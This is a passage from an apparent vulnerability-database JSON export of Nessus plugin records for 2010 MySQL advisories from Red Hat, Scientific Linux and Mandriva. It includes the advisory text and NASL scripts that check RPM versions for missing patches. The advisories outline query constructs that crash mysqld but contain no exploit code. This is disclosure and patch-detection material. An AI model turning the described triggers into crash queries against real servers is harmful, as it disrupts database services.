authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.", "edition": 9, "reporter": "Tenable", "published": "2010-11-04T00:00:00", "title": "RHEL 5 : mysql (RHSA-2010:0825)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-11-28T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:mysql-bench", "p-cpe:/a:redhat:enterprise_linux:mysql-devel", "p-cpe:/a:redhat:enterprise_linux:mysql-server", "p-cpe:/a:redhat:enterprise_linux:mysql-test", "p-cpe:/a:redhat:enterprise_linux:mysql"], "id": "REDHAT-RHSA-2010-0825.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0825. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50474);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/11/28 11:42:05\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42598, 42599, 42633, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2010:0825\");\n\n script_name(english:\"RHEL 5 : mysql (RHSA-2010:0825)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3833\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3835\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3836\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3839\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3840\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0825\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0825\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"mysql-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mysql-bench-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mysql-bench-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mysql-bench-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"mysql-devel-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mysql-server-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mysql-server-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mysql-server-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mysql-test-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mysql-test-5.0.77-4.el5_5.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mysql-test-5.0.77-4.el5_5.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-server / mysql-test\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:14:22", "references": ["http://www.nessus.org/u?208167f3"], "pluginID": "60884", "description": "It was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAfter installing this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.", "edition": 6, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : mysql on SL5.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2019-01-02T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101103_MYSQL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60884);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/02 10:36:43\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n\n script_name(english:\"Scientific Linux Security Update : mysql on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the MySQL PolyFromWKB() function did not sanity\ncheck Well-Known Binary (WKB) data. A remote, authenticated attacker\ncould use specially crafted WKB data to crash mysqld. This issue only\ncaused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain JOIN queries. If a\nstored procedure contained JOIN queries, and that procedure was\nexecuted twice in sequence, it could cause an infinite loop, leading\nto excessive CPU use (up to 100%). A remote, authenticated attacker\ncould use this flaw to cause a denial of service. (CVE-2010-3839)\n\nA flaw was found in the way MySQL processed queries that provide a\nmixture of numeric and longblob data types to the LEAST or GREATEST\nfunction. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3838)\n\nA flaw was found in the way MySQL processed PREPARE statements\ncontaining both GROUP_CONCAT and the WITH ROLLUP modifier. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments\nin view prepare mode. A remote, authenticated attacker could possibly\nuse this flaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a\nvalue to a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to\ncrash mysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of\nextreme-value functions, such as LEAST and GREATEST. A remote,\nauthenticated attacker could use this flaw to crash mysqld. This issue\nonly caused a temporary denial of service, as mysqld was automatically\nrestarted after the crash. (CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for\nsome complex SELECT queries. A remote, authenticated attacker could\nuse this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the\ncrash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated\nattacker could use this flaw to provide such requests, causing mysqld\nto crash. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage\nengine. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as\nmysqld was automatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt\nto retrieve data from a unique SET column. A remote, authenticated\nattacker could use this flaw to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted\nafter the crash. (CVE-2010-3677)\n\nAfter installing this update, the MySQL server daemon (mysqld) will be\nrestarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1011&L=scientific-linux-errata&T=0&P=194\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?208167f3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"mysql-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mysql-bench-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mysql-devel-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mysql-server-5.0.77-4.el5_5.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mysql-test-5.0.77-4.el5_5.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:11:19", "references": ["https://bugs.mysql.com/bug.php?id=54044", "https://bugs.mysql.com/bug.php?id=54461", "https://bugs.mysql.com/bug.php?id=54568", "https://bugs.mysql.com/bug.php?id=53544", "https://bugs.mysql.com/bug.php?id=54007", "https://bugs.mysql.com/bug.php?id=52711", "https://bugs.mysql.com/bug.php?id=54575", "https://bugs.mysql.com/bug.php?id=55826", "https://bugs.mysql.com/bug.php?id=51875", "https://bugs.mysql.com/bug.php?id=55564", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html", "https://bugs.mysql.com/bug.php?id=54476", "https://bugs.mysql.com/bug.php?id=55568"], "pluginID": "50533", "description": "Multiple vulnerabilities were discovered and corrected in mysql :\n\n - Joins involving a table with with a unique SET column\n could cause a server crash (CVE-2010-3677).\n\n - Use of TEMPORARY InnoDB tables with nullable columns\n could cause a server crash (CVE-2010-3680).\n\n - The server could crash if there were alternate reads\n from two indexes on a table using the HANDLER interface\n (CVE-2010-3681).\n\n - Using EXPLAIN with queries of the form SELECT ... UNION\n ... ORDER BY (SELECT ... WHERE ...) could cause a server\n crash (CVE-2010-3682).\n\n - During evaluation of arguments to extreme-value\n functions (such as LEAST() and GREATEST()), type errors\n did not propagate properly, causing the server to crash\n (CVE-2010-3833).\n\n - The server could crash after materializing a derived\n table that required a temporary table for grouping\n (CVE-2010-3834).\n\n - A user-variable assignment expression that is evaluated\n in a logical expression context can be precalculated in\n a temporary table for GROUP BY. However, when the\n expression value is used after creation of the temporary\n table, it was re-evaluated, not read from the table and\n a server crash resulted (CVE-2010-3835).\n\n - Pre-evaluation of LIKE predicates during view\n preparation could cause a server crash (CVE-2010-3836).\n\n - GROUP_CONCAT() and WITH ROLLUP together could cause a\n server crash (CVE-2010-3837).\n\n - Queries could cause a server crash if the GREATEST() or\n LEAST() function had a mixed list of numeric and\n LONGBLOB arguments, and the result of such a function\n was processed using an intermediate temporary table\n (CVE-2010-3838).\n\n - Queries with nested joins could cause an infinite loop\n in the server when used from stored procedures and\n prepared statements (CVE-2010-3839).\n\n - The PolyFromWKB() function could crash the server when\n improper WKB data was passed to the function\n (CVE-2010-3840).\n\nAdditionally the default behaviour of using the mysqlmanager instead\nof the mysqld_safe script has been reverted in the SysV init script\nbecause of instability issues with the mysqlmanager.\n\nPackages for 2009.0 are provided as of the Extended Maintenance\nProgram. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149&amp;products_id=4\n90\n\nThe updated packages have been upgraded to mysql 5.0.91 and patched to\ncorrect these issues.", "edition": 8, "reporter": "Tenable", "published": "2010-11-10T00:00:00", "title": "Mandriva Linux Security Advisory : mysql (MDVSA-2010:222)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:mysql-doc", "p-cpe:/a:mandriva:linux:mysql-ndb-management", "p-cpe:/a:mandriva:linux:mysql-bench", "p-cpe:/a:mandriva:linux:mysql", "p-cpe:/a:mandriva:linux:libmysql-devel", "p-cpe:/a:mandriva:linux:lib64mysql15", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:mysql-max", "p-cpe:/a:mandriva:linux:mysql-ndb-tools", "p-cpe:/a:mandriva:linux:lib64mysql-static-devel", "p-cpe:/a:mandriva:linux:mysql-ndb-storage", "p-cpe:/a:mandriva:linux:mysql-common", "p-cpe:/a:mandriva:linux:mysql-ndb-extra", "p-cpe:/a:mandriva:linux:mysql-client", "p-cpe:/a:mandriva:linux:lib64mysql-devel", "p-cpe:/a:mandriva:linux:libmysql-static-devel", "p-cpe:/a:mandriva:linux:libmysql15"], "id": "MANDRIVA_MDVSA-2010-222.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50533", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:222. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50533);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/01/02 16:37:54\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42598, 42599, 42633, 42646, 43676);\n script_xref(name:\"MDVSA\", value:\"2010:222\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mysql (MDVSA-2010:222)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered and corrected in mysql :\n\n - Joins involving a table with with a unique SET column\n could cause a server crash (CVE-2010-3677).\n\n - Use of TEMPORARY InnoDB tables with nullable columns\n could cause a server crash (CVE-2010-3680).\n\n - The server could crash if there were alternate reads\n from two indexes on a table using the HANDLER interface\n (CVE-2010-3681).\n\n - Using EXPLAIN with queries of the form SELECT ... UNION\n ... ORDER BY (SELECT ... WHERE ...) could cause a server\n crash (CVE-2010-3682).\n\n - During evaluation of arguments to extreme-value\n functions (such as LEAST() and GREATEST()), type errors\n did not propagate properly, causing the server 